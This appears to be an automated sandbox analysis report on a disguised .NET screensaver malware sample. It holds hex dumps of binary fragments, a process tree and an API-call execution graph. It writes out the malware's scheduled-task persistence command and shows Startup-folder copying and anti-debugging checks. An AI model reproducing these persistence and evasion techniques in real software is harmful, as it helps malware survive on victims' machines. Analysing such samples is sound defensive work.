                      2023-10-24 07:28:52 UTC72INData Raw: 95 33 80 0a 31 b8 f6 6e 56 d4 74 e4 c2 f2 7a 6e be 22 a3 ee e0 f0 6f ba 34 36 63 bf d1 3f cf a1 54 e0 18 2c fa c8 1f da c0 1e d1 57 08 6a 8f 65 d3 d9 9c 66 8a 92 09 a5 c3 c5 d6 fb 54 37 9d 16 04 d2 90 e1 da 4e 73 f6 02 c9 2d c1 1f 18 b2 c9 a6 fe eb f7 a3 68 17 c1 d6 72 68 34 f2 24 85 89 81 ba 53 35 d9 ae 8a 85 65 a5 63 c0 64 47 86 ab 13 0c 54 55 4c a5 73 9b bb ce 0a 67 e6 3e 03 de 44 a4 40 64 c5 7c ef f8 74 65 91 fd 04 56 5d 8f ec bc 21 e5 d0 2f 3c db 47 b7 7a 0a a3 22 9f 26 a1 85 7c c0 07 21 e6 97 1c 5b e1 e6 13 75 96 65 71 7b 7b 29 1d 1e 0e 15 67 65 1d 0d 01 e4 55 51 c6 6b 5c 7f d9 9c 87 cb d6 89 c9 74 4d 56 c7 d2 20 15 99 28 a7 75 09 83 77 67 59 a2 04 d8 95 37 06 8f 1f a8 19 17 8b d5 f3 b0 52 93 55 99 c7 10 9d 4a ec ec 4b 2d aa 50 62 d8 07 72 42 e5 c6
                      Data Ascii: 31nVtzn"o46c?T,WjefT7Ns-hrh4$S5ecdGTULsg>D@d|teV]!/<Gz"&|![ueq{{)geUQk\tMV (uwgY7RUJK-PbrB
                      2023-10-24 07:28:52 UTC76INData Raw: c6 de da 89 e7 fd 89 9f 87 98 92 89 fe c0 c7 9f 9d 92 89 d1 9f 9d 92 89 db df 93 9f 9f 87 99 80 89 ee cc ca c2 c6 86 9b 99 98 99 99 98 99 98 89 ef c0 db cc cf c6 d1 86 9f 9f 87 99 9e 5e 47 bd 4c 93 57 90 12 da 80 92 96 0f f5 c2 0d 7f ac b0 8b 04 fd f1 30 16 3d 9b c7 84 1a 68 47 01 bd fa 96 34 4f e9 02 e8 a8 0d 6d a1 ff 24 35 11 e4 53 6b 5c 20 9a 60 56 8d 36 55 bb c9 46 64 71 62 67 67 6a 24 3e 25 3b 2b 23 62 5b 63 64 65 6e 30 2b 48 5b 5e 2b 62 5b 63 64 65 6e 2b 44 58 2b 3a 3a 54 3f 54 3a 2b 67 62 60 6e 2b 46 6a 68 2b 44 58 2b 53 22 2b 4a 7b 7b 67 6e 5c 6e 69 40 62 7f 24 3d 3b 3e 25 3a 25 3a 3e 2b 23 40 43 5f 46 47 27 2b 67 62 60 6e 2b 4c 6e 68 60 64 22 2b 5d 6e 79 78 62 64 65 24 3a 3a 25 3b 2b 46 64 69 62 67 6e 24 3a 3e 4e 3a 3f 33 2b 58 6a 6d 6a 79 62 24
                      Data Ascii: ^GLW0=hG4Om$5Sk\ `V6UFdqbggj$>%;+#b[cden0+H[^+b[cden+DX+::T?T:+gb`n+Fjh+DX+S"+J{{gn\ni@b$=;>%:%:>+#@C_FG'+gb`n+Lnh`d"+]nyxbde$::%;+Fdibgn$:>N:?3+Xjmjyb$
                      2023-10-24 07:28:52 UTC81INData Raw: 36 6e 41 33 47 f9 84 6d da 21 8a 20 a4 12 bd d1 e0 8b 81 eb 46 58 9b d5 fc 4a b1 71 4a 98 b2 3a 67 b4 c1 df 16 6a f5 be cc 9f 7d 7a 35 02 02 1f 02 4a 50 48 e3 f9 23 f5 26 f3 b3 25 e4 00 98 9d 9b 98 44 e9 95 be 22 42 6f 50 b9 a1 a6 51 de bb 75 96 c3 1e a6 b2 53 f2 03 26 bb 4a 57 e5 8c 55 67 1c 23 44 7d 26 0b 28 0e 7c 64 33 34 92 40 33 a4 48 38 3d 8f 21 e1 f1 eb 47 a6 40 c2 da 73 cb 5c e3 fb 52 d3 2e 99 3d 4f 8a 9a 10 29 4e 7a 5f c3 f3 16 02 1f a7 fc 33 85 2a 37 fc d7 e5 48 4e 9b b1 07 f5 97 ee 5f 76 ae fa ee 05 87 d1 c8 9c cd 46 7d cf c3 70 ac b4 e6 c7 cc a9 f6 9d e3 f4 f2 69 41 4c 75 77 47 85 c8 d5 94 a0 54 24 b9 f7 ac b4 61 9a 2f 90 68 79 8a 2a 05 52 0e cf 21 b5 7f 11 95 84 c3 3a 5c 50 55 48 7e a8 3b 22 1c 87 fb ef 1a 18 47 5b 6e d5 01 c8 c1 4a 72 f5 76
                      Data Ascii: 6nA3Gm! FXJqJ:gj}z5JPH#&%D"BoPQuS&JWUg#D}&(|d34@3H8=!G@s\R.=O)Nz_3*7HN_vF}piALuwGT$a/hy*R!:\PUH~;"G[nJrv
                      2023-10-24 07:28:52 UTC85INData Raw: aa 52 cf 09 30 5b dd ff 62 eb f8 69 4f 3e 05 64 ae 67 5f cd 94 86 f7 a6 09 a2 2a 3b 1c 7b 38 1f 07 94 cc fb e6 09 85 2e 1b 34 1a 17 02 a0 85 bf b9 0b 8c df 10 6b b3 55 24 5a 29 ff 8e 31 a2 e3 e6 b2 d8 61 bb 71 0a 7d a4 e1 30 96 7a 6e f4 05 84 e2 70 30 8f 9c 28 b4 54 3e 63 62 65 a0 bd 09 f7 fd 94 37 31 50 c7 23 04 48 00 0e b0 b1 b1 2e 3a 1c da b5 65 23 7b ac c0 71 53 49 8a 24 0c 7c c9 69 c0 9a ea 33 02 43 3d a4 3d 61 dd 28 2f 80 61 f9 7a 38 63 f2 3b 99 8e 4a 3d 22 e3 e7 c5 a3 16 88 7e 97 4e a0 43 07 19 97 78 c1 e5 1a ce 97 42 d2 e8 91 a9 d4 18 d7 2e 26 0b a0 f5 df 60 55 df 99 4a 55 aa 98 32 69 68 68 b5 72 1e cc 7a 79 b3 74 7c a5 e0 10 ff 33 f9 41 6f a6 5f 29 27 94 a3 11 3a 36 22 e1 4c cf 78 ed a9 a0 26 dc 37 b6 4b 5d b4 73 97 23 50 ff 4f 56 ab 9f 08 e6 03
                      Data Ascii: R0[biO>dg_*;{8.4kU$Z)1aq}0znp0(T>cbe71P#H.:e#{qSI$|i3C==a(/az8c;J="~NCxB.&`UJU2ihhrzyt|3Ao_)':6"Lx&7K]s#POV
                      2023-10-24 07:28:52 UTC89INData Raw: 21 4e 67 69 5e e6 a1 d7 14 e6 79 8b 8a dd 26 db d2 f4 ef 3a bb bb 62 89 f0 bc 6a b7 9f c3 29 15 66 9e 0c 57 ef 84 b3 43 c5 a7 f2 ee f6 b5 8d 99 98 55 5f 24 dc bc a3 66 eb de 78 a2 7b e9 37 50 bd 63 24 ec d1 cf ec 4e 40 ac 74 13 c8 74 92 3b 2e d0 1e 4a 64 04 39 aa 69 65 64 a6 6b 10 0c 11 c7 db 70 a2 30 93 91 a1 c8 c8 69 11 e4 30 47 8f 9e 77 4b 3d 74 ab ca ec eb b8 2a 7a f1 2b 64 db 42 2e e5 99 a3 25 43 ff aa 8c 07 56 e1 53 20 08 62 6b 07 f3 c5 ce 9d 1b 10 83 b6 78 69 17 b0 9d 64 8e cf b5 4a ae ec 78 34 4b 92 e7 a3 74 0b 98 98 21 17 85 23 53 6c 6a 6d 5f 6c 77 15 73 91 c9 88 1f 6f cb 96 93 dc 6a f1 53 83 6a be b4 7e 8f bf 79 3c b5 78 9c 78 1d df 47 00 2a 7a f4 78 5c 24 81 26 cd 09 cc c0 c1 b5 ff 0b 38 83 b8 14 2e 63 62 07 93 b1 9c 37 dc 50 ec a7 51 eb 4e 93
                      Data Ascii: !Ngi^y&:bj)fWCU_$fx{7Pc$N@tt;.Jd9iedkp0i0GwK=t*z+dB.%CVS bkxidJx4Kt!#Sljm_lwsojSj~y<xxG*zx\$&8.cb7PQN
                      2023-10-24 07:28:52 UTC93INData Raw: e4 57 9d 35 07 03 e9 3d b9 87 d9 63 8f fd e2 9f 28 eb 10 01 79 2f e1 b0 27 41 6b 5c 0c 65 55 d5 c7 60 bf c2 0d e0 ec de cf 76 24 be 87 93 fa 90 ee 6f 5f 58 6a ec cd b5 75 ec 0d c6 8d 31 53 31 04 9c 2f 3e 1f 91 8f 8b 8f fe 32 32 02 0b 22 28 94 46 da 6d 9d 06 fd 6a db 92 09 4d 21 d3 26 46 41 45 d0 8c 83 f7 ca 52 cf dd 17 59 37 ba ca aa 52 c3 79 7f bd 20 94 4c 34 99 c0 9d 34 d2 70 74 d8 ec f0 bd 3a 96 a4 9c 7c 88 9e bf ef a4 32 21 c7 5f fa 5d 59 a7 88 21 b1 84 58 ea 36 2d 1d fc b2 9d 98 91 b9 95 9a 95 93 91 86 a7 84 98 9d 80 a2 80 4b c9 0d 6f bc 1f dc 02 34 82 ef c0 c5 cc e4 c8 c7 c8 ce cc db fa d9 c5 c0 dd 5c 90 66 9f d5 d4 d8 13 1b 31 63 cf 0c b5 3e ba 66 4e 6a a1 52 4d 23 e7 57 ba f0 3d 3d 7c a4 54 9e dc 27 c7 83 96 58 49 23 59 87 4f e7 fa 01 b9 7e 65 76
                      Data Ascii: W5=c(y/'Ak\eU`v$o_Xju1S1/>22"(FmjM!&FAERY7Ry L44pt:|2!_]Y!X6-Ko4\f1c>fNjRM#W==|T'XI#YO~ev
                      2023-10-24 07:28:52 UTC97INData Raw: 17 00 00 23 7e 00 00 b4 17 00 00 64 17 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 18 2f 00 00 9c 00 00 00 23 55 53 00 b4 2f 00 00 10 00 00 00 23 47 55 49 44 00 00 00 c4 2f 00 00 04 0c 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 0a 57 35 a2 1d 09 0f 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 a0 00 00 00 11 00 00 00 3f 00 00 00 66 00 00 00 02 00 00 00 4f 01 00 00 33 00 00 00 02 00 00 00 38 00 00 00 03 00 00 00 06 00 00 00 07 00 00 00 05 00 00 00 0a 00 00 00 07 00 00 00 01 00 00 00 06 00 00 00 01 00 00 00 04 00 00 00 03 00 00 00 02 00 00 00 00 00 01 00 01 00 00 00 00 00 0a 00 d3 00 dc 00 0a 00 fb 00 2e 00 0a 00 0e 01 1e 01 0a 00 35 01 3e 01 0a 00 5c 01 63 01 0a 00 a1 01 63 01 0a 00 ac 01 2e 00 0a 00 b6 01 2e 00 0a 00 d5 01 2e 00
                      Data Ascii: #~d#Strings/#US/#GUID/#BlobW53?fO38.5>\cc...
                      2023-10-24 07:28:52 UTC100INData Raw: 01 00 00 00 16 00 2a 16 de 0a 03 00 f0 15 01 00 00 00 16 00 50 16 fb 0a 03 00 3c 16 01 00 00 00 96 00 b3 00 d7 02 03 00 00 20 02 00 00 00 00 20 04 00 00 00 09 00 ee 00 1e 00 11 00 02 01 22 00 19 00 2f 01 28 00 21 00 4a 01 42 00 21 00 53 01 47 00 09 00 6d 01 5f 00 09 00 82 01 64 00 29 00 9c 01 6a 00 29 00 b1 01 71 00 41 00 c3 01 79 00 21 00 cb 01 80 00 61 00 2f 01 a5 00 69 00 2f 01 a1 00 71 00 2f 01 dc 00 81 00 2f 01 a1 00 89 00 2f 01 a1 00 0c 00 2f 01 a1 00 14 00 2f 01 a1 00 1c 00 2f 01 a1 00 24 00 2f 01 a1 00 0c 00 b3 00 35 01 14 00 b3 00 35 01 1c 00 b3 00 35 01 24 00 b3 00 35 01 a1 00 2f 01 a5 00 a9 00 2f 01 a1 00 b1 00 2f 01 a1 00 b9 00 2f 01 a1 00 2c 00 b3 00 b7 01 c1 00 c4 03 ca 01 91 00 2f 01 a1 00 c9 00 2f 01 da 01 d1 00 35 04 e9 01 91 00 44 04 ee
                      Data Ascii: *P< "/(!JB!SGm_d)j)qAy!a/i/q//////$/555$5////,//5D
                      2023-10-24 07:28:52 UTC104INData Raw: 61 74 68 00 47 65 74 50 61 74 68 52 6f 6f 74 00 44 72 69 76 65 49 6e 66 6f 00 67 65 74 5f 54 6f 74 61 6c 53 69 7a 65 00 43 6f 6e 63 61 74 00 50 72 6f 6a 65 63 74 44 61 74 61 00 53 65 74 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 45 78 63 65 70 74 69 6f 6e 00 55 49 6e 74 36 34 00 43 6c 65 61 72 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 53 74 72 69 6e 67 42 75 69 6c 64 65 72 00 4d 44 35 43 72 79 70 74 6f 53 65 72 76 69 63 65 50 72 6f 76 69 64 65 72 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 53 43 49 49 00 48 61 73 68 41 6c 67 6f 72 69 74 68 6d 00 43 6f 6d 70 75 74 65 48 61 73 68 00 41 70 70 65 6e 64 00 53 75 62 73 74 72 69 6e 67 00 54 6f 55 70 70 65 72 00 43 6f 6e 76 65 72 74 00 46 72 6f 6d 42 61 73 65
                      Data Ascii: athGetPathRootDriveInfoget_TotalSizeConcatProjectDataSetProjectErrorExceptionUInt64ClearProjectErrorStringBuilderMD5CryptoServiceProviderSystem.Security.Cryptographyget_ASCIIHashAlgorithmComputeHashAppendSubstringToUpperConvertFromBase
                      2023-10-24 07:28:52 UTC108INData Raw: 74 48 64 63 00 52 65 6c 65 61 73 65 48 64 63 00 43 75 72 73 6f 72 73 00 67 65 74 5f 50 6f 73 69 74 69 6f 6e 00 44 72 61 77 00 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 45 6e 63 6f 64 65 72 00 51 75 61 6c 69 74 79 00 67 65 74 5f 50 61 72 61 6d 00 43 61 70 74 75 72 65 00 47 65 74 49 6d 61 67 65 45 6e 63 6f 64 65 72 73 00 67 65 74 5f 4d 69 6d 65 54 79 70 65 00 47 65 74 45 6e 63 6f 64 65 72 49 6e 66 6f 00 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41
                      Data Ascii: tHdcReleaseHdcCursorsget_PositionDrawop_InequalityEncoderQualityget_ParamCaptureGetImageEncodersget_MimeTypeGetEncoderInfoAssemblyDescriptionAttributeAssemblyProductAttributeAssemblyTrademarkAttributeAssemblyTitleAttributeAssemblyCompanyA
                      2023-10-24 07:28:52 UTC113INData Raw: 00 6e 00 00 00 00 00 00 00 b0 04 0c 03 00 00 01 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 e8 02 00 00 01 00 30 00 30 00 30 00 30 00 30 00 34 00 62 00 30 00 00 00 4c 00 16 00 01 00 43 00 6f 00 6d 00 70 00 61 00 6e 00 79 00 4e 00 61 00 6d 00 65 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 43 00 6f 00 72 00 70 00 6f 00 72 00 61 00 74 00 69 00 6f 00 6e 00 00 00 5c 00 1a 00 01 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 00 00 00 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 20 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 6f 00 72 00 00 00 40 00 0f 00 01 00 46 00 69 00 6c 00 65 00 56 00
                      Data Ascii: nStringFileInfo000004b0LCompanyNameMicrosoft Corporation\FileDescriptionWindows Command Processor@FileV


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:09:28:50
                      Start date:24/10/2023
                      Path:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Imagebase:0xb80000
                      File size:283'648 bytes
                      MD5 hash:D88092AABD3AF3BA4EF626C31962626E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:2
                      Start time:09:28:52
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0x440000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 91%, ReversingLabs
                      • Detection: 51%, Virustotal, Browse
                      Reputation:low
                      Has exited:false

                      General

                      Target ID:3
                      Start time:09:28:54
                      Start date:24/10/2023
                      Path:C:\Windows\System32\schtasks.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Imagebase:0x7ff713a70000
                      File size:235'008 bytes
                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:4
                      Start time:09:28:55
                      Start date:24/10/2023
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:7
                      Start time:09:29:10
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0x4e0000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 91%, ReversingLabs
                      • Detection: 51%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:8
                      Start time:09:29:26
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0x140000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:9
                      Start time:09:29:34
                      Start date:24/10/2023
                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr" /S
                      Imagebase:0xac0000
                      File size:116'224 bytes
                      MD5 hash:2F621D531B27FF6BCF35DB5412A879BF
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 91%, ReversingLabs
                      • Detection: 51%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:13
                      Start time:09:30:01
                      Start date:24/10/2023
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2696
                      Imagebase:0x2f0000
                      File size:483'680 bytes
                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:high
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:23.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:15.5%
                        Total number of Nodes:278
                        Total number of Limit Nodes:15
                        execution_graph 35018 13fd01c 35019 13fd034 35018->35019 35020 13fd08e 35019->35020 35028 2ddb8b5 35019->35028 35032 2ddd728 35019->35032 35036 2ddd718 35019->35036 35040 2ddb8cc 35019->35040 35044 2ddd850 35019->35044 35048 9ac1670 35019->35048 35056 9ac16a0 35019->35056 35029 2ddb8c5 35028->35029 35064 2ddb904 35029->35064 35031 2ddd867 35031->35020 35033 2ddd74e 35032->35033 35034 2ddb8cc GetModuleHandleW 35033->35034 35035 2ddd75a 35034->35035 35035->35020 35037 2ddd728 35036->35037 35038 2ddb8cc GetModuleHandleW 35037->35038 35039 2ddd75a 35038->35039 35039->35020 35041 2ddb8d7 35040->35041 35042 2ddb904 GetModuleHandleW 35041->35042 35043 2ddd867 35042->35043 35043->35020 35045 2ddd860 35044->35045 35046 2ddb904 GetModuleHandleW 35045->35046 35047 2ddd867 35046->35047 35047->35020 35049 9ac1675 35048->35049 35050 9ac1701 35049->35050 35052 9ac16f1 35049->35052 35102 9ac0714 35050->35102 35053 9ac16ff 35052->35053 35092 9ac1828 35052->35092 35097 9ac1818 35052->35097 35059 9ac16cd 35056->35059 35057 9ac1701 35058 9ac0714 CallWindowProcW 35057->35058 35060 9ac16ff 35058->35060 35059->35057 35061 9ac16f1 35059->35061 35061->35060 35062 9ac1828 CallWindowProcW 35061->35062 35063 9ac1818 CallWindowProcW 35061->35063 35062->35060 35063->35060 35065 2ddb90f 35064->35065 35066 2ddd937 35065->35066 35088 2ddb520 35065->35088 35068 2ddd994 35066->35068 35070 2ddb904 GetModuleHandleW 35066->35070 35072 2ddb8f8 35066->35072 35080 2ddd870 35066->35080 35068->35031 35070->35068 35073 2ddb8fd 35072->35073 35074 2ddd937 35073->35074 35075 2ddb520 GetModuleHandleW 35073->35075 35076 2ddd994 35074->35076 35077 2ddb8f8 GetModuleHandleW 35074->35077 35078 2ddb904 GetModuleHandleW 35074->35078 35079 2ddd870 GetModuleHandleW 35074->35079 35075->35074 35076->35068 35077->35076 35078->35076 35079->35076 35081 2ddd880 35080->35081 35082 2ddd937 35081->35082 35083 2ddb520 GetModuleHandleW 35081->35083 35084 2ddd994 35082->35084 35085 2ddb8f8 GetModuleHandleW 35082->35085 35086 2ddb904 GetModuleHandleW 35082->35086 35087 2ddd870 GetModuleHandleW 35082->35087 35083->35082 35084->35068 35085->35084 35086->35084 35087->35084 35089 2ddce40 GetModuleHandleW 35088->35089 35091 2ddceb5 35089->35091 35091->35066 35093 9ac1836 35092->35093 35094 9ac183e 35093->35094 35095 9ac0714 CallWindowProcW 35093->35095 35094->35053 35096 9ac187c 35095->35096 35096->35053 35098 9ac1836 35097->35098 35099 9ac183e 35098->35099 35100 9ac0714 CallWindowProcW 35098->35100 35099->35053 35101 9ac187c 35100->35101 35101->35053 35103 9ac071f 35102->35103 35104 9ac18d9 35103->35104 35105 9ac192a CallWindowProcW 35103->35105 35104->35053 35105->35104 34995 144ee00 34996 144ee3f CheckRemoteDebuggerPresent 34995->34996 34997 144ee6b 34996->34997 35106 9ac0848 35107 9ac088e GetCurrentProcess 35106->35107 35109 9ac08d9 35107->35109 35110 9ac08e0 GetCurrentThread 35107->35110 35109->35110 35111 9ac091d GetCurrentProcess 35110->35111 35112 9ac0916 35110->35112 35113 9ac0953 35111->35113 35112->35111 35118 9ac0df9 35113->35118 35120 9ac0a17 35113->35120 35114 9ac097b GetCurrentThreadId 35115 9ac09ac 35114->35115 35119 9ac0dfe 35118->35119 35119->35114 35124 9ac0a89 DuplicateHandle 35120->35124 35126 9ac0a90 DuplicateHandle 35120->35126 35121 9ac0a56 35121->35114 35125 9ac0b26 35124->35125 35125->35121 35127 9ac0b26 35126->35127 35127->35121 34998 2dd0798 34999 2dd07db MapViewOfFile 34998->34999 35000 2dd0812 34999->35000 35128 2dd50b8 35130 2dd50cd 35128->35130 35129 2dd5179 35130->35129 35134 2dd53f8 35130->35134 35137 2dd53f0 35130->35137 35131 2dd522d 35135 2dd543b VirtualAlloc 35134->35135 35136 2dd546f 35135->35136 35136->35131 35138 2dd53f8 VirtualAlloc 35137->35138 35140 2dd546f 35138->35140 35140->35131 35001 2dd0850 35002 2dd0891 FindCloseChangeNotification 35001->35002 35003 2dd08be 35002->35003 35141 2dd0ab0 35142 2dd0ab9 VirtualProtect 35141->35142 35144 2dd0b32 35142->35144 35145 2ddfcb0 35146 2ddffb8 35145->35146 35148 2ddfcd8 35145->35148 35147 2ddfce1 35148->35147 35152 144ff20 35148->35152 35157 144ff30 35148->35157 35149 2ddfd04 35153 144ff23 35152->35153 35154 144ff1b 35152->35154 35153->35154 35162 9acfea8 35153->35162 35165 9acfeb0 OleInitialize 35153->35165 35154->35149 35158 144ff3b 35157->35158 35159 144ff4b 35158->35159 35160 9acfea8 OleInitialize 35158->35160 35161 9acfeb0 OleInitialize 35158->35161 35159->35149 35160->35159 35161->35159 35163 9acfeaf OleInitialize 35162->35163 35164 9acff13 35162->35164 35163->35164 35164->35154 35166 9acff14 35165->35166 35166->35154 35167 2dd8170 35168 2dd8196 35167->35168 35169 2dd823a 35168->35169 35172 2dd8468 35168->35172 35176 2dd8457 35168->35176 35174 2dd8496 35172->35174 35173 2dd8521 35173->35173 35174->35173 35180 2dd802c 35174->35180 35178 2dd8468 35176->35178 35177 2dd8521 35177->35177 35178->35177 35179 2dd802c 3 API calls 35178->35179 35179->35177 35181 2dd8037 35180->35181 35183 2ddb967 35181->35183 35184 2ddb4c0 35181->35184 35183->35173 35186 2ddb4cb 35184->35186 35185 2ddba31 35185->35183 35186->35185 35189 2ddc3d0 35186->35189 35195 2ddc3c0 35186->35195 35190 2ddc3fb 35189->35190 35201 2ddc994 35190->35201 35191 2ddc47e 35192 2ddc4aa 35191->35192 35193 2ddb520 GetModuleHandleW 35191->35193 35192->35192 35193->35192 35196 2ddc3d0 35195->35196 35200 2ddc994 3 API calls 35196->35200 35197 2ddc47e 35198 2ddb520 GetModuleHandleW 35197->35198 35199 2ddc4aa 35197->35199 35198->35199 35200->35197 35202 2ddc9cd 35201->35202 35203 2ddca4e 35202->35203 35206 2ddcb10 35202->35206 35219 2ddcb00 35202->35219 35207 2ddcb25 35206->35207 35208 2ddb520 GetModuleHandleW 35207->35208 35209 2ddcb49 35207->35209 35208->35209 35210 2ddb520 GetModuleHandleW 35209->35210 35218 2ddcd05 35209->35218 35212 2ddcc8b 35210->35212 35211 2ddcd60 35211->35203 35212->35211 35215 2ddb520 GetModuleHandleW 35212->35215 35212->35218 35213 2ddce88 GetModuleHandleW 35214 2ddceb5 35213->35214 35214->35203 35216 2ddccd9 35215->35216 35217 2ddb520 GetModuleHandleW 35216->35217 35216->35218 35217->35218 35218->35203 35218->35211 35218->35213 35220 2ddcb10 35219->35220 35221 2ddb520 GetModuleHandleW 35220->35221 35222 2ddcb49 35220->35222 35221->35222 35223 2ddb520 GetModuleHandleW 35222->35223 35231 2ddcd05 35222->35231 35225 2ddcc8b 35223->35225 35224 2ddcd60 35224->35203 35225->35224 35228 2ddb520 GetModuleHandleW 35225->35228 35225->35231 35226 2ddce88 GetModuleHandleW 35227 2ddceb5 35226->35227 35227->35203 35229 2ddccd9 35228->35229 35230 2ddb520 GetModuleHandleW 35229->35230 35229->35231 35230->35231 35231->35203 35231->35224 35231->35226 35232 2ddd570 35233 2ddd5d8 CreateWindowExW 35232->35233 35235 2ddd694 35233->35235 35236 2dd5570 35237 2dd55b3 VirtualFree 35236->35237 35238 2dd55e4 35237->35238 35239 9ac565f 35240 9ac561e 35239->35240 35241 9ac566e 35239->35241 35244 9ac5220 35240->35244 35243 9ac562d 35243->35243 35245 9ac522b 35244->35245 35246 9ac5df9 35245->35246 35249 9ac6dc0 35245->35249 35254 9ac6db0 35245->35254 35246->35243 35250 9ac6de1 35249->35250 35251 9ac6e05 35250->35251 35259 9ac6f60 35250->35259 35263 9ac6f70 35250->35263 35251->35246 35255 9ac6de1 35254->35255 35256 9ac6e05 35255->35256 35257 9ac6f60 5 API calls 35255->35257 35258 9ac6f70 5 API calls 35255->35258 35256->35246 35257->35256 35258->35256 35260 9ac6f7d 35259->35260 35261 9ac6fb6 